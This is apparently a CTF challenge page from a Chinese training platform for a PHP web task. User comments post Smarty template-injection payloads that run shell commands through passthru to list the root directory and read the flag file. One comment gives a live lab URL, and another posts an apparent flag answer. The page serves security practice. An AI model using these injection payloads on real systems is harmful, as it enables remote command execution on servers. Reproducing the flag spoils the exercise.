聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: Lazzaro
一血奖励: 3金币
解  决: 3570
提  示:
描  述:
聪明的php
评论
anony 1月前

flag{********}

回复 0

人闲桂花落 2月前

tac命令读取也可

回复 0

docker0w 1年前

1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获

回复 2

bx33661 1年前

?key={passthru("tac%20/_28710")}

回复 0

yun20231227 1年前

?key={{passthru('ls /')}}

回复 1

xinkuang 1年前

http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}

回复 1

Daniel2023 1年前

flag{0e54d64e616af92957ddbb6c6ea37c5f}

回复 0

一路奔腾 1年前

?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120

回复 0

EtHat 1年前

index.php?a={passthru("tac /_4060")}

回复 0
FUCK123 1年前

fnmdp

回复 0

18904484271 1年前

好垃圾的靶场,明明flag出来了,但是提交显示不正确

回复 1

WriteUp

image
midi

3 金币

评分(13)

解题动态

zhuyh69 攻破了该题 12小时前
huangyujie 攻破了该题 14小时前
aaaaab 攻破了该题 1天前
那天晚风和她 攻破了该题 1天前
姥姥 攻破了该题 2天前
欲语泪先流 攻破了该题 2天前
zhuzhu123 攻破了该题 3天前
stragon 攻破了该题 4天前
聪10011 攻破了该题 4天前
孙燕姿圈外男友 攻破了该题 5天前
ctfldc 攻破了该题 6天前
xqew 攻破了该题 6天前
muzijinming 攻破了该题 6天前
lin666 攻破了该题 7天前
小城阿扬 攻破了该题 7天前
zeeker001 攻破了该题 8天前
spicyburger 攻破了该题 10天前
eason2023 攻破了该题 10天前
baotou91 攻破了该题 11天前
zdevelop 攻破了该题 12天前
问题反馈